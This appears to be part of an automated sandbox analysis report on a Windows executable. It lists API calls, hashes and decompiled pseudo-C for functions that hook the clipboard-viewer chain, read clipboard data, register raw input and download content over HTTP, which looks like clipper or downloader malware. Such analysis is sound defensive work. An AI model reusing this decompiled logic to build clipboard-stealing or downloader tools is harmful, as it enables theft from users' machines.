                                                                                                                                                                                                                                                                  0x00404051
                                                                                                                                                                                                                                                                  0x00404056
                                                                                                                                                                                                                                                                  0x00404059
                                                                                                                                                                                                                                                                  0x00404028
                                                                                                                                                                                                                                                                  0x0040402c
                                                                                                                                                                                                                                                                  0x00404066
                                                                                                                                                                                                                                                                  0x0040406b
                                                                                                                                                                                                                                                                  0x0040406e
                                                                                                                                                                                                                                                                  0x0040402e
                                                                                                                                                                                                                                                                  0x00404032
                                                                                                                                                                                                                                                                  0x0040403c
                                                                                                                                                                                                                                                                  0x00404041
                                                                                                                                                                                                                                                                  0x00404044
                                                                                                                                                                                                                                                                  0x00404044
                                                                                                                                                                                                                                                                  0x00404032
                                                                                                                                                                                                                                                                  0x0040402c
                                                                                                                                                                                                                                                                  0x00404075
                                                                                                                                                                                                                                                                  0x0040407b
                                                                                                                                                                                                                                                                  0x00404085
                                                                                                                                                                                                                                                                  0x0040408b
                                                                                                                                                                                                                                                                  0x00404097
                                                                                                                                                                                                                                                                  0x0040409c
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00404085
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00404010
                                                                                                                                                                                                                                                                  0x00403ff8
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00403fcf
                                                                                                                                                                                                                                                                  0x00403f05
                                                                                                                                                                                                                                                                  0x00403f2e
                                                                                                                                                                                                                                                                  0x00403f3b
                                                                                                                                                                                                                                                                  0x00403f07
                                                                                                                                                                                                                                                                  0x00403f0b
                                                                                                                                                                                                                                                                  0x004040bf
                                                                                                                                                                                                                                                                  0x004040c5
                                                                                                                                                                                                                                                                  0x004040c8
                                                                                                                                                                                                                                                                  0x004040cb
                                                                                                                                                                                                                                                                  0x004040d4
                                                                                                                                                                                                                                                                  0x004040dd
                                                                                                                                                                                                                                                                  0x004040e1
                                                                                                                                                                                                                                                                  0x004040f0
                                                                                                                                                                                                                                                                  0x004040fe
                                                                                                                                                                                                                                                                  0x004040fe
                                                                                                                                                                                                                                                                  0x00403f0b
                                                                                                                                                                                                                                                                  0x00000000

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetWindowLongW.USER32(?,000000EB), ref: 00403EDC
                                                                                                                                                                                                                                                                  • SetClipboardViewer.USER32(?), ref: 00403F28
                                                                                                                                                                                                                                                                  • SetWindowLongW.USER32 ref: 00403F3B
                                                                                                                                                                                                                                                                  • IsClipboardFormatAvailable.USER32(0000000D), ref: 00403F90
                                                                                                                                                                                                                                                                  • OpenClipboard.USER32(00000000), ref: 00403FD7
                                                                                                                                                                                                                                                                  • GetClipboardData.USER32 ref: 00403FE9
                                                                                                                                                                                                                                                                  • RegisterRawInputDevices.USER32(?,00000001,0000000C), ref: 004040F0
                                                                                                                                                                                                                                                                  • ChangeClipboardChain.USER32(?,?), ref: 004040FE
                                                                                                                                                                                                                                                                  • DefWindowProcA.USER32(?,?,?,?), ref: 00404114
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.296293403.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296287218.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296308470.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296320207.0000000000412000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Clipboard$Window$Long$AvailableChainChangeDataDevicesFormatInputOpenProcRegisterViewer
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3549449529-0
                                                                                                                                                                                                                                                                  • Opcode ID: a69993eea088427a97e9e977c118ea55afaf776965cc7ea7f3e60b572320150e
                                                                                                                                                                                                                                                                  • Instruction ID: 96edcc278ed0497f99117f545b7404bf08a66114077c170e205bfa907dcbbdbe
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a69993eea088427a97e9e977c118ea55afaf776965cc7ea7f3e60b572320150e
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4C714EB5900209EFDB14DFA4C988BAE7BB8AF48301F14453AF605BB2D0D7789E44CB59
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  C-Code - Quality: 92%
                                                                                                                                                                                                                                                                  			E0040DE00(intOrPtr* __edi) {
                                                                                                                                                                                                                                                                  				void* __esi;
                                                                                                                                                                                                                                                                  				void* _t25;
                                                                                                                                                                                                                                                                  				long _t40;
                                                                                                                                                                                                                                                                  				intOrPtr* _t53;
                                                                                                                                                                                                                                                                  				intOrPtr* _t55;
                                                                                                                                                                                                                                                                  				void* _t56;
                                                                                                                                                                                                                                                                  				LONG* _t62;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_t53 = __edi;
                                                                                                                                                                                                                                                                  				if(__edi == 0 ||  *__edi != 0x494f4350) {
                                                                                                                                                                                                                                                                  					return _t25;
                                                                                                                                                                                                                                                                  				} else {
                                                                                                                                                                                                                                                                  					_t1 = _t53 + 0x20; // 0x20
                                                                                                                                                                                                                                                                  					EnterCriticalSection(_t1);
                                                                                                                                                                                                                                                                  					_t55 =  *((intOrPtr*)(__edi + 0x38));
                                                                                                                                                                                                                                                                  					if(_t55 == 0) {
                                                                                                                                                                                                                                                                  						L11:
                                                                                                                                                                                                                                                                  						_t13 = _t53 + 0x20; // 0x20
                                                                                                                                                                                                                                                                  						LeaveCriticalSection(_t13);
                                                                                                                                                                                                                                                                  						SetEvent( *(_t53 + 0x10));
                                                                                                                                                                                                                                                                  						_t56 = 0;
                                                                                                                                                                                                                                                                  						if( *((intOrPtr*)(_t53 + 4)) <= 0) {
                                                                                                                                                                                                                                                                  							L14:
                                                                                                                                                                                                                                                                  							E0040B9B0( *((intOrPtr*)(_t53 + 0xc)), 0xffffffff);
                                                                                                                                                                                                                                                                  							E0040BAF0( *((intOrPtr*)(_t53 + 0xc)));
                                                                                                                                                                                                                                                                  							CloseHandle( *(_t53 + 8));
                                                                                                                                                                                                                                                                  							CloseHandle( *(_t53 + 0x10));
                                                                                                                                                                                                                                                                  							__imp__WSACloseEvent( *((intOrPtr*)(_t53 + 0x18)));
                                                                                                                                                                                                                                                                  							E00409320( *((intOrPtr*)(_t53 + 0x14)));
                                                                                                                                                                                                                                                                  							_t24 = _t53 + 0x20; // 0x20
                                                                                                                                                                                                                                                                  							DeleteCriticalSection(_t24);
                                                                                                                                                                                                                                                                  							return E00408990(_t53);
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						do {
                                                                                                                                                                                                                                                                  							PostQueuedCompletionStatus( *(_t53 + 8), 0, 0, 0);
                                                                                                                                                                                                                                                                  							_t56 = _t56 + 1;
                                                                                                                                                                                                                                                                  						} while (_t56 <  *((intOrPtr*)(_t53 + 4)));
                                                                                                                                                                                                                                                                  						goto L14;
                                                                                                                                                                                                                                                                  					} else {
                                                                                                                                                                                                                                                                  						goto L3;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					do {
                                                                                                                                                                                                                                                                  						L3:
                                                                                                                                                                                                                                                                  						if( *_t55 == 0x69636c69) {
                                                                                                                                                                                                                                                                  							if( *((char*)(_t55 + 0x275)) == 0) {
                                                                                                                                                                                                                                                                  								_t62 = _t55 + 0x21c;
                                                                                                                                                                                                                                                                  								_t40 = InterlockedExchangeAdd(_t62, 0);
                                                                                                                                                                                                                                                                  								if(_t40 == 0) {
                                                                                                                                                                                                                                                                  									 *(_t55 + 0x230) = _t40;
                                                                                                                                                                                                                                                                  									 *((intOrPtr*)(_t55 + 0x220)) = 1;
                                                                                                                                                                                                                                                                  									 *((intOrPtr*)(_t55 + 0x228)) = _t55 + 8;
                                                                                                                                                                                                                                                                  									 *((intOrPtr*)(_t55 + 0x22c)) = 0x200;
                                                                                                                                                                                                                                                                  									InterlockedIncrement(_t62);
                                                                                                                                                                                                                                                                  									if(E0040E450(_t55) == 0) {
                                                                                                                                                                                                                                                                  										InterlockedDecrement(_t62);
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						_t55 =  *((intOrPtr*)(_t55 + 0x280));
                                                                                                                                                                                                                                                                  					} while (_t55 != 0);
                                                                                                                                                                                                                                                                  					goto L11;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  			}










                                                                                                                                                                                                                                                                  0x0040de00
                                                                                                                                                                                                                                                                  0x0040de02
                                                                                                                                                                                                                                                                  0x0040df37
                                                                                                                                                                                                                                                                  0x0040de14
                                                                                                                                                                                                                                                                  0x0040de16
                                                                                                                                                                                                                                                                  0x0040de1a
                                                                                                                                                                                                                                                                  0x0040de20
                                                                                                                                                                                                                                                                  0x0040de25
                                                                                                                                                                                                                                                                  0x0040deb0
                                                                                                                                                                                                                                                                  0x0040deb0
                                                                                                                                                                                                                                                                  0x0040deb4
                                                                                                                                                                                                                                                                  0x0040debe
                                                                                                                                                                                                                                                                  0x0040dec4
                                                                                                                                                                                                                                                                  0x0040dec9
                                                                                                                                                                                                                                                                  0x0040dee3
                                                                                                                                                                                                                                                                  0x0040dee9
                                                                                                                                                                                                                                                                  0x0040def2
                                                                                                                                                                                                                                                                  0x0040df04
                                                                                                                                                                                                                                                                  0x0040df0a
                                                                                                                                                                                                                                                                  0x0040df10
                                                                                                                                                                                                                                                                  0x0040df1a
                                                                                                                                                                                                                                                                  0x0040df22
                                                                                                                                                                                                                                                                  0x0040df26
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040df36
                                                                                                                                                                                                                                                                  0x0040ded1
                                                                                                                                                                                                                                                                  0x0040dedb
                                                                                                                                                                                                                                                                  0x0040dedd
                                                                                                                                                                                                                                                                  0x0040dede
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040de2b
                                                                                                                                                                                                                                                                  0x0040de2b
                                                                                                                                                                                                                                                                  0x0040de31
                                                                                                                                                                                                                                                                  0x0040de53
                                                                                                                                                                                                                                                                  0x0040de57
                                                                                                                                                                                                                                                                  0x0040de5e
                                                                                                                                                                                                                                                                  0x0040de66
                                                                                                                                                                                                                                                                  0x0040de6c
                                                                                                                                                                                                                                                                  0x0040de72
                                                                                                                                                                                                                                                                  0x0040de7c
                                                                                                                                                                                                                                                                  0x0040de82
                                                                                                                                                                                                                                                                  0x0040de8c
                                                                                                                                                                                                                                                                  0x0040de99
                                                                                                                                                                                                                                                                  0x0040de9c
                                                                                                                                                                                                                                                                  0x0040de9c
                                                                                                                                                                                                                                                                  0x0040de99
                                                                                                                                                                                                                                                                  0x0040de66
                                                                                                                                                                                                                                                                  0x0040de53
                                                                                                                                                                                                                                                                  0x0040dea2
                                                                                                                                                                                                                                                                  0x0040dea8
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040de2b

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(00000020,0040B670,?,0040E9A4), ref: 0040DE1A
                                                                                                                                                                                                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 0040DE46
                                                                                                                                                                                                                                                                  • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040DE5E
                                                                                                                                                                                                                                                                  • InterlockedIncrement.KERNEL32(?), ref: 0040DE8C
                                                                                                                                                                                                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 0040DE9C
                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(00000020,?,0040E9A4), ref: 0040DEB4
                                                                                                                                                                                                                                                                  • SetEvent.KERNEL32(?,?,0040E9A4), ref: 0040DEBE
                                                                                                                                                                                                                                                                  • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,0040E9A4), ref: 0040DEDB
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,0040E9A4), ref: 0040DF04
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,0040E9A4), ref: 0040DF0A
                                                                                                                                                                                                                                                                  • WSACloseEvent.WS2_32(?), ref: 0040DF10
                                                                                                                                                                                                                                                                  • DeleteCriticalSection.KERNEL32(00000020,?,?,?,0040E9A4), ref: 0040DF26
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.296293403.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296287218.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296308470.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296320207.0000000000412000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Interlocked$CloseCriticalSection$DecrementEventHandle$CompletionDeleteEnterExchangeIncrementLeavePostQueuedStatus
                                                                                                                                                                                                                                                                  • String ID: PCOI$ilci
                                                                                                                                                                                                                                                                  • API String ID: 2403999931-3762367603
                                                                                                                                                                                                                                                                  • Opcode ID: 89350a157d29e29f4a1b1d797befc67f64273c81bb48e2ba99e5f8922f900f69
                                                                                                                                                                                                                                                                  • Instruction ID: 73f0472627ba8a888b827b8634c70e373476b8db8a351e124d448d94f7e1e702
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 89350a157d29e29f4a1b1d797befc67f64273c81bb48e2ba99e5f8922f900f69
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 663185B1900B05ABD720EFB5D948B57B7A8BF18710F048539E55AB7681C738F858CBD8
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  C-Code - Quality: 68%
                                                                                                                                                                                                                                                                  			E00404120() {
                                                                                                                                                                                                                                                                  				struct HWND__* _v8;
                                                                                                                                                                                                                                                                  				struct tagMSG _v36;
                                                                                                                                                                                                                                                                  				struct _WNDCLASSEXW _v84;
                                                                                                                                                                                                                                                                  				short _v596;
                                                                                                                                                                                                                                                                  				unsigned int _t20;
                                                                                                                                                                                                                                                                  				void* _t39;
                                                                                                                                                                                                                                                                  				void* _t40;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				do {
                                                                                                                                                                                                                                                                  					_v84.cbSize = 0;
                                                                                                                                                                                                                                                                  					memset( &(_v84.style), 0, 0x2c);
                                                                                                                                                                                                                                                                  					_t40 = _t39 + 0xc;
                                                                                                                                                                                                                                                                  					_v84.cbSize = 0x30;
                                                                                                                                                                                                                                                                  					_v84.lpfnWndProc = E00403ED0;
                                                                                                                                                                                                                                                                  					_v84.hInstance = GetModuleHandleW(0);
                                                                                                                                                                                                                                                                  					_v84.lpszClassName =  &_v596;
                                                                                                                                                                                                                                                                  					do {
                                                                                                                                                                                                                                                                  						Sleep(1);
                                                                                                                                                                                                                                                                  						_t20 = GetTickCount();
                                                                                                                                                                                                                                                                  						wsprintfW( &_v596, L"%x%X", GetTickCount(), _t20 >> 1);
                                                                                                                                                                                                                                                                  						_t40 = _t40 + 0x10;
                                                                                                                                                                                                                                                                  					} while ((RegisterClassExW( &_v84) & 0x0000ffff) == 0);
                                                                                                                                                                                                                                                                  					_v8 = CreateWindowExW(0, _v84.lpszClassName, 0, 0, 0, 0, 0, 0, 0xfffffffd, 0, _v84.hInstance, 0);
                                                                                                                                                                                                                                                                  					if(_v8 != 0) {
                                                                                                                                                                                                                                                                  						while(GetMessageA( &_v36, 0, 0, 0) > 0) {
                                                                                                                                                                                                                                                                  							TranslateMessage( &_v36);
                                                                                                                                                                                                                                                                  							DispatchMessageA( &_v36);
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						goto L7;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					break;
                                                                                                                                                                                                                                                                  					L7:
                                                                                                                                                                                                                                                                  				} while (0 != 0);
                                                                                                                                                                                                                                                                  				ExitThread(0);
                                                                                                                                                                                                                                                                  			}










                                                                                                                                                                                                                                                                  0x00404129
                                                                                                                                                                                                                                                                  0x00404129
                                                                                                                                                                                                                                                                  0x00404138
                                                                                                                                                                                                                                                                  0x0040413d
                                                                                                                                                                                                                                                                  0x00404140
                                                                                                                                                                                                                                                                  0x00404147
                                                                                                                                                                                                                                                                  0x00404156
                                                                                                                                                                                                                                                                  0x0040415f
                                                                                                                                                                                                                                                                  0x00404162
                                                                                                                                                                                                                                                                  0x00404164
                                                                                                                                                                                                                                                                  0x0040416a
                                                                                                                                                                                                                                                                  0x00404186
                                                                                                                                                                                                                                                                  0x0040418c
                                                                                                                                                                                                                                                                  0x0040419c
                                                                                                                                                                                                                                                                  0x004041c2
                                                                                                                                                                                                                                                                  0x004041c9
                                                                                                                                                                                                                                                                  0x004041cd
                                                                                                                                                                                                                                                                  0x004041e5
                                                                                                                                                                                                                                                                  0x004041ef
                                                                                                                                                                                                                                                                  0x004041ef
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x004041cd
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x004041f7
                                                                                                                                                                                                                                                                  0x004041f7
                                                                                                                                                                                                                                                                  0x00404201

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.296293403.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296287218.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296308470.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296320207.0000000000412000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Message$CountTick$ClassCreateDispatchExitHandleModuleRegisterSleepThreadTranslateWindowmemsetwsprintf
                                                                                                                                                                                                                                                                  • String ID: %x%X$0
                                                                                                                                                                                                                                                                  • API String ID: 716646876-225668902
                                                                                                                                                                                                                                                                  • Opcode ID: 7a61a55b5eea98f5de0928e7475679bbe4d963543bacc3d689d31b3a0f4c3ad5
                                                                                                                                                                                                                                                                  • Instruction ID: 56e4f97a71f57edc04f120d05ce9dd721e6d08997ed102387e837c06df15420b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7a61a55b5eea98f5de0928e7475679bbe4d963543bacc3d689d31b3a0f4c3ad5
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BB212174900208EBEB209BE0DD4DFAE7778BB44701F504139F602BA5D0DBB899499B68
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 485 40bf80-40c01b memset InternetCrackUrlA InternetOpenA 486 40c021-40c054 InternetConnectA 485->486 487 40c197-40c1a0 485->487 488 40c18a-40c191 InternetCloseHandle 486->488 489 40c05a-40c08a HttpOpenRequestA 486->489 488->487 490 40c090-40c0a7 HttpSendRequestA 489->490 491 40c17d-40c184 InternetCloseHandle 489->491 492 40c170-40c177 InternetCloseHandle 490->492 493 40c0ad-40c0b1 490->493 491->488 492->491 494 40c166 493->494 495 40c0b7 493->495 494->492 496 40c0c1-40c0c8 495->496 497 40c159-40c164 496->497 498 40c0ce-40c0f0 InternetReadFile 496->498 497->492 499 40c0f2-40c0f9 498->499 500 40c0fb 498->500 499->500 501 40c0fd-40c154 call 408880 memcpy 499->501 500->497 501->496
                                                                                                                                                                                                                                                                  C-Code - Quality: 82%
                                                                                                                                                                                                                                                                  			E0040BF80(char* _a4, char** _a8) {
                                                                                                                                                                                                                                                                  				char _v260;
                                                                                                                                                                                                                                                                  				char _v772;
                                                                                                                                                                                                                                                                  				long _v776;
                                                                                                                                                                                                                                                                  				void* _v780;
                                                                                                                                                                                                                                                                  				intOrPtr _v792;
                                                                                                                                                                                                                                                                  				char* _v796;
                                                                                                                                                                                                                                                                  				signed short _v816;
                                                                                                                                                                                                                                                                  				intOrPtr _v820;
                                                                                                                                                                                                                                                                  				char* _v824;
                                                                                                                                                                                                                                                                  				void _v836;
                                                                                                                                                                                                                                                                  				void* _v840;
                                                                                                                                                                                                                                                                  				void* _v844;
                                                                                                                                                                                                                                                                  				void* _v848;
                                                                                                                                                                                                                                                                  				char* _v852;
                                                                                                                                                                                                                                                                  				void _v1876;
                                                                                                                                                                                                                                                                  				long _v1880;
                                                                                                                                                                                                                                                                  				void* _t91;
                                                                                                                                                                                                                                                                  				void* _t92;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_v776 = 0;
                                                                                                                                                                                                                                                                  				_v840 = 0;
                                                                                                                                                                                                                                                                  				memset( &_v836, 0, 0x38);
                                                                                                                                                                                                                                                                  				_t92 = _t91 + 0xc;
                                                                                                                                                                                                                                                                  				_v840 = 0x3c;
                                                                                                                                                                                                                                                                  				_v824 =  &_v260;
                                                                                                                                                                                                                                                                  				_v820 = 0x100;
                                                                                                                                                                                                                                                                  				_v796 =  &_v772;
                                                                                                                                                                                                                                                                  				_v792 = 0x200;
                                                                                                                                                                                                                                                                  				InternetCrackUrlA(_a4, 0, 0x10000000,  &_v840);
                                                                                                                                                                                                                                                                  				_v780 = InternetOpenA(0, 1, 0, 0, 0);
                                                                                                                                                                                                                                                                  				if(_v780 != 0) {
                                                                                                                                                                                                                                                                  					_v844 = InternetConnectA(_v780,  &_v260, _v816 & 0x0000ffff, 0, 0, 3, 0, 0);
                                                                                                                                                                                                                                                                  					if(_v844 != 0) {
                                                                                                                                                                                                                                                                  						_v848 = HttpOpenRequestA(_v844, "GET",  &_v772, 0, 0, 0, 0, 0);
                                                                                                                                                                                                                                                                  						if(_v848 != 0) {
                                                                                                                                                                                                                                                                  							if(HttpSendRequestA(_v848, 0, 0, 0, 0) != 0) {
                                                                                                                                                                                                                                                                  								if(_a8 == 0) {
                                                                                                                                                                                                                                                                  									_v776 = 1;
                                                                                                                                                                                                                                                                  								} else {
                                                                                                                                                                                                                                                                  									_v852 = 0;
                                                                                                                                                                                                                                                                  									while(1 != 0) {
                                                                                                                                                                                                                                                                  										_t87 = _v848;
                                                                                                                                                                                                                                                                  										if(InternetReadFile(_v848,  &_v1876, 0x400,  &_v1880) != 0 && _v1880 != 0) {
                                                                                                                                                                                                                                                                  											_v776 = E00408880(_v776, _t87, _v776,  &(_v852[_v1880]));
                                                                                                                                                                                                                                                                  											memcpy( &(_v852[_v776]),  &_v1876, _v1880);
                                                                                                                                                                                                                                                                  											_t92 = _t92 + 0x14;
                                                                                                                                                                                                                                                                  											_v852 =  &(_v852[_v1880]);
                                                                                                                                                                                                                                                                  											continue;
                                                                                                                                                                                                                                                                  										}
                                                                                                                                                                                                                                                                  										break;
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  									 *_a8 = _v852;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							InternetCloseHandle(_v848);
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						InternetCloseHandle(_v844);
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					InternetCloseHandle(_v780);
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				return _v776;
                                                                                                                                                                                                                                                                  			}





















                                                                                                                                                                                                                                                                  0x0040bf89
                                                                                                                                                                                                                                                                  0x0040bf93
                                                                                                                                                                                                                                                                  0x0040bfa8
                                                                                                                                                                                                                                                                  0x0040bfad
                                                                                                                                                                                                                                                                  0x0040bfb0
                                                                                                                                                                                                                                                                  0x0040bfc0
                                                                                                                                                                                                                                                                  0x0040bfc6
                                                                                                                                                                                                                                                                  0x0040bfd6
                                                                                                                                                                                                                                                                  0x0040bfdc
                                                                                                                                                                                                                                                                  0x0040bff8
                                                                                                                                                                                                                                                                  0x0040c00e
                                                                                                                                                                                                                                                                  0x0040c01b
                                                                                                                                                                                                                                                                  0x0040c047
                                                                                                                                                                                                                                                                  0x0040c054
                                                                                                                                                                                                                                                                  0x0040c07d
                                                                                                                                                                                                                                                                  0x0040c08a
                                                                                                                                                                                                                                                                  0x0040c0a7
                                                                                                                                                                                                                                                                  0x0040c0b1
                                                                                                                                                                                                                                                                  0x0040c166
                                                                                                                                                                                                                                                                  0x0040c0b7
                                                                                                                                                                                                                                                                  0x0040c0b7
                                                                                                                                                                                                                                                                  0x0040c0c1
                                                                                                                                                                                                                                                                  0x0040c0e1
                                                                                                                                                                                                                                                                  0x0040c0f0
                                                                                                                                                                                                                                                                  0x0040c119
                                                                                                                                                                                                                                                                  0x0040c13a
                                                                                                                                                                                                                                                                  0x0040c13f
                                                                                                                                                                                                                                                                  0x0040c14e
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040c14e
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040c0f0
                                                                                                                                                                                                                                                                  0x0040c162
                                                                                                                                                                                                                                                                  0x0040c162
                                                                                                                                                                                                                                                                  0x0040c0b1
                                                                                                                                                                                                                                                                  0x0040c177
                                                                                                                                                                                                                                                                  0x0040c177
                                                                                                                                                                                                                                                                  0x0040c184
                                                                                                                                                                                                                                                                  0x0040c184
                                                                                                                                                                                                                                                                  0x0040c191
                                                                                                                                                                                                                                                                  0x0040c191
                                                                                                                                                                                                                                                                  0x0040c1a0

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • memset.NTDLL ref: 0040BFA8
                                                                                                                                                                                                                                                                  • InternetCrackUrlA.WININET(0040CD99,00000000,10000000,0000003C), ref: 0040BFF8
                                                                                                                                                                                                                                                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040C008
                                                                                                                                                                                                                                                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040C041
                                                                                                                                                                                                                                                                  • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040C077
                                                                                                                                                                                                                                                                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040C09F
                                                                                                                                                                                                                                                                  • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040C0E8
                                                                                                                                                                                                                                                                  • memcpy.NTDLL(00000000,?,00000000), ref: 0040C13A
                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040C177
                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040C184
                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040C191
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.296293403.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296287218.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296308470.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296320207.0000000000412000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectCrackFileReadSendmemcpymemset
                                                                                                                                                                                                                                                                  • String ID: <$GET
